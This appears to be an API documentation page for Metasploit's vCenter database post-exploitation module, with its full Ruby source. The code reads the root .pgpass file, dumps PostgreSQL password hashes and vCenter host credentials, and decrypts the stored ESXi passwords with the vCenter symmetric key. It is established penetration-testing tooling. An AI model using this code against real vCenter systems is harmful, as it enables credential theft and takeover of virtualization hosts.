Module: Msf::Post::Vcenter::Database

Includes:

File

Defined in:

lib/msf/core/post/vcenter/database.rb

Instance Method Summary

• #get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name) ⇒ Hash

  Returns a list of vpc customization contents.

• #get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key) ⇒ Array

  Returns a list of vpc customization contents.

• #get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key) ⇒ Array

  Returns a list of virtual machines located on the server.

• #pgpass_file ⇒ Object
• #postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost') ⇒ String

  A helper function to return the command line statement string to connect to the postgresql server.

• #process_pgpass_file(location = pgpass_file) ⇒ Array

  Returns a array of hashes of the .pgpass file.

• #psql_bin ⇒ Object
• #query_pg_shadow_values(pg_password, vcdb_user, vcdb_name) ⇒ Array

  Returns a list of postgres users and password hashes from the database.

• #query_vpx_creds(pg_password, vcdb_user, vcdb_name, symkey = nil) ⇒ Array

  Returns a list of vpx users and password hashes from the database.

• #vpx_aes_decrypt(b64, vc_sym_key) ⇒ String

  helper function to decrypt passwords stored in the pg database.

Methods included from File

#_append_file_powershell, #_append_file_unix_shell, #_can_echo?, #_read_file_meterpreter, #_read_file_powershell, #_read_file_powershell_fragment, #_shell_command_with_success_code, #_shell_process_with_success_code, #_unix_max_line_length, #_win_ansi_append_file, #_win_ansi_write_file, #_win_bin_append_file, #_win_bin_write_file, #_write_file_meterpreter, #_write_file_powershell, #_write_file_powershell_fragment, #_write_file_unix_shell, #append_file, #attributes, #cd, #chmod, #copy_file, #dir, #directory?, #executable?, #exist?, #expand_path, #exploit_data, #exploit_source, #file?, #file_local_write, #file_remote_digestmd5, #file_remote_digestsha1, #file_remote_digestsha2, #immutable?, #initialize, #mkdir, #pwd, #read_file, #readable?, #rename_file, #rm_f, #rm_rf, #setuid?, #stat, #upload_and_chmodx, #upload_file, #writable?, #write_file

Methods included from Common

#clear_screen, #cmd_exec, #cmd_exec_get_pid, #cmd_exec_with_result, #command_exists?, #create_process, #get_env, #get_envs, #initialize, #peer, #report_virtualization, #rhost, #rport

Instance Method Details

#get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name) ⇒ Hash

Returns a list of vpc customization contents

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

Returns:

• (Hash) —

  where the customization name is the key and value is the parsed xml doc, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 188

def get_vpx_customization_spec(pg_password, vcdb_user, vcdb_name)
  return nil unless command_exists? psql_bin

  output = {}
  vpx_customization_specs = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT DISTINCT name FROM vc.vpx_customization_spec;' -P pager -A -t")
  return nil if vpx_customization_specs.nil?

  vpx_customization_specs = vpx_customization_specs.split("\n")
  return nil unless vpx_customization_specs.first

  vpx_customization_specs.each do |spec|
    xml = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c \"SELECT body FROM vpx_customization_spec WHERE name = '#{spec}\';\" -P pager -A -t").to_s.strip.gsub("\r\n", '').gsub("\n", '').gsub(/>\s*/, '>').gsub(/\s*</, '<')
    next if xml.nil?

    begin
      xmldoc = Nokogiri::XML(xml) do |config|
        config.options = Nokogiri::XML::ParseOptions::STRICT | Nokogiri::XML::ParseOptions::NONET
      end
    rescue Nokogiri::XML::SyntaxError
      print_bad("Unable to read XML from #{spec}")
      next
    end
    output[spec] = xmldoc
  end
  output
end

#get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key) ⇒ Array

Returns a list of vpc customization contents

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

• vc_sym_key (String) —

  sym key from virtual center

Returns:

• (Array) —

  list of hash tables where each table is a user, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 257

def get_vpx_users(pg_password, vcdb_user, vcdb_name, vc_sym_key)
  return nil unless command_exists? psql_bin

  output = []
  vpxuser_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT dns_name, ip_address, user_name, password FROM vc.vpx_host ORDER BY dns_name ASC;' -P pager -A -t")
  return nil if vpxuser_rows.nil?

  vpxuser_rows = vpxuser_rows.split("\n")
  return nil unless vpxuser_rows.first

  vpxuser_rows.each do |vpxuser_row|
    row_data = vpxuser_row.split('|')
    next if row_data.length < 4 # should always be 4 based on query, but this will catch 'command not found' or other things like that

    user = {
      'fqdn' => row_data[0],
      'ip' => row_data[1],
      'user' => row_data[2]
    }

    vpxuser_secret_b64 = row_data[3].gsub('*', '')
    user['password'] = vpx_aes_decrypt(vpxuser_secret_b64, vc_sym_key).gsub('\"', '"')
    output.append(user)
  end
  output
end

#get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key) ⇒ Array

Returns a list of virtual machines located on the server

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

• _vc_sym_key (String) —

  sym key from virtual center

Returns:

• (Array) —

  list of hash tables where each table is a user, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 223

def get_vpx_vms(pg_password, vcdb_user, vcdb_name, _vc_sym_key)
  return nil unless command_exists? psql_bin

  output = []
  vm_rows = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT vmid, name, configfilename, guest_state, is_template FROM vpxv_vms;' -P pager -A -t")
  return nil if vm_rows.nil?

  vm_rows = vm_rows.split("\n")
  return nil unless vm_rows.first

  vm_rows.each do |vm_row|
    row_data = vm_row.split('|')
    next if row_data.length < 5 # should always be 5 based on query, but this will catch 'command not found' or other things like that

    vm = {
      'vmid' => row_data[0],
      'name' => row_data[1],
      'configfilename' => row_data[3],
      'guest_state' => row_data[4],
      'is_template' => row_data[5]
    }
    output.append(vm)
  end
  output
end

#pgpass_file ⇒ Object

# File 'lib/msf/core/post/vcenter/database.rb', line 9

def pgpass_file
  '/root/.pgpass'
end

#postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost') ⇒ String

A helper function to return the command line statement string to connect to the postgresql server

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

• vcdb_host (String) (defaults to: 'localhost') —

  virtual center hostname. Defaults to 'localhost'

Returns:

• (String) —

  a string to run on command line

# File 'lib/msf/core/post/vcenter/database.rb', line 173

def postgress_connect(pg_password, vcdb_user, vcdb_name, vcdb_host = 'localhost')
  # should come in wrapped in quotes, but if not wrap
  unless pg_password.start_with?("'") && pg_password.end_with?("'")
    pg_password = "'#{pg_password}'"
  end
  "PGPASSWORD=#{pg_password} #{psql_bin} -h '#{vcdb_host}' -U '#{vcdb_user}' -d '#{vcdb_name}'"
end

#process_pgpass_file(location = pgpass_file) ⇒ Array

Returns a array of hashes of the .pgpass file

Parameters:

• location (String) (defaults to: pgpass_file) —

  where the file is located. defaults to /root/.pgpass

Returns:

• (Array) —

  array of hashes of the file contents, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 22

def process_pgpass_file(location = pgpass_file)
  return nil unless file_exist?(location)

  contents = read_file(location)
  return nil if contents.nil?
  return nil if contents.empty?

  output = []
  contents.each_line(chomp: true) do |line|
    # file format hostname:port:database:username:password
    # https://www.postgresql.org/docs/current/libpq-pgpass.html
    next unless line.include?(':') # attempt to do a little quality control

    sections = line.split(':')
    o = {}
    o['hostname'] = sections[0].strip
    o['port'] = sections[1].strip
    o['database'] = sections[2]
    o['username'] = sections[3]
    o['password'] = sections[4]

    o['port'] = '5432' if o['port'] == '*'
    output.append(o)
  end
  output
end

#psql_bin ⇒ Object

# File 'lib/msf/core/post/vcenter/database.rb', line 13

def psql_bin
  '/opt/vmware/vpostgres/current/bin/psql'
end

#query_pg_shadow_values(pg_password, vcdb_user, vcdb_name) ⇒ Array

Returns a list of postgres users and password hashes from the database

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

Returns:

• (Array) —

  list of hash tables where each table is a user, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 56

def query_pg_shadow_values(pg_password, vcdb_user, vcdb_name)
  return nil unless command_exists? psql_bin

  output = []
  postgres_users = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT usename, passwd FROM pg_shadow;' -P pager -A -t")
  return nil if postgres_users.nil?

  postgres_users = postgres_users.split("\n")
  return nil unless postgres_users.first

  postgres_users.each do |postgres_user|
    row_data = postgres_user.split('|')
    next if row_data.length < 2 # should always be 2 based on query, but this will catch 'command not found' or other things like that

    user = {
      'user' => row_data[0],
      'password_hash' => row_data[1]
    }

    output.append(user)
  end
  output
end

#query_vpx_creds(pg_password, vcdb_user, vcdb_name, symkey = nil) ⇒ Array

Returns a list of vpx users and password hashes from the database

Parameters:

• pg_password (String) —

  postgresql password

• vcdb_user (String) —

  virtual center database username

• vcdb_name (String) —

  virtual center database name

• symkey (String) (defaults to: nil) —

  string of they symkey

Returns:

• (Array) —

  list of hash tables where each table is a user, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 119

def query_vpx_creds(pg_password, vcdb_user, vcdb_name, symkey = nil)
  return nil unless command_exists? psql_bin

  output = []
  vpx_creds = cmd_exec("#{postgress_connect(pg_password, vcdb_user, vcdb_name)} -c 'SELECT user_name, password, local_ip_address, ip_address, dns_name FROM VPX_HOST;' -P pager -A -t")
  return nil if vpx_creds.nil?

  vpx_creds = vpx_creds.split("\n")
  return nil unless vpx_creds.first

  vpx_creds.each do |vpx_user|
    row_data = vpx_user.split('|')
    next if row_data.length < 2 # should always be 2 based on query, but this will catch 'command not found' or other things like that

    user = {
      'user' => row_data[0],
      'encrypted_password' => row_data[1],
      'local_ip' => row_data[2],
      'ip_address' => row_data[3],
      'dns_name' => row_data[4]
    }
    unless symkey.nil?
      # https://github.com/shmilylty/vhost_password_decrypt/blob/main/decrypt.py
      # https://pentera.io/blog/information-disclosure-in-vmware-vcenter/
      encrypted_password = row_data[1].gsub('*', '').strip
      encrypted_password = Base64.decode64(encrypted_password)
      encrypted_password = encrypted_password.scan(/.{16}/)

      iv = encrypted_password.shift
      encrypted_password = encrypted_password.join
      begin
        cipher = OpenSSL::Cipher.new('aes-256-cbc')
        cipher.decrypt
        cipher.key = [symkey.strip].pack('H*')
        cipher.iv = iv
        user['decrypted_password'] = cipher.update(encrypted_password) + cipher.final
      rescue OpenSSL::Cipher::CipherError => e
        vprint_error("Unable to decrypt password for #{user} due to OpenSSL Cipher Error: #{e}")
      end
    end

    output.append(user)
  end
  output
end

#vpx_aes_decrypt(b64, vc_sym_key) ⇒ String

helper function to decrypt passwords stored in the pg database

Parameters:

• b64 (String) —

  base64 string of the password exported from postgres

• vc_sym_key (String) —

  sym key from virtual center

Returns:

• (String) —

  the decrypted password, nil on error

# File 'lib/msf/core/post/vcenter/database.rb', line 290

def vpx_aes_decrypt(b64, vc_sym_key)
  # https://www.pentera.io/wp-content/uploads/2022/03/Sensitive-Information-Disclosure_VMware-vCenter_f.pdf
  secret_bytes = Base64.strict_decode64(b64)
  iv = secret_bytes[0, 16]
  ciphertext = secret_bytes[16, 64]
  decipher = OpenSSL::Cipher.new('aes-256-cbc')
  decipher.decrypt
  decipher.iv = iv
  decipher.padding = 1
  decipher.key = vc_sym_key
  return (decipher.update(ciphertext) + decipher.final).delete("\000")
rescue StandardError => e
  elog('Error performing vpx_aes_decrypt', error: e)
  ''
end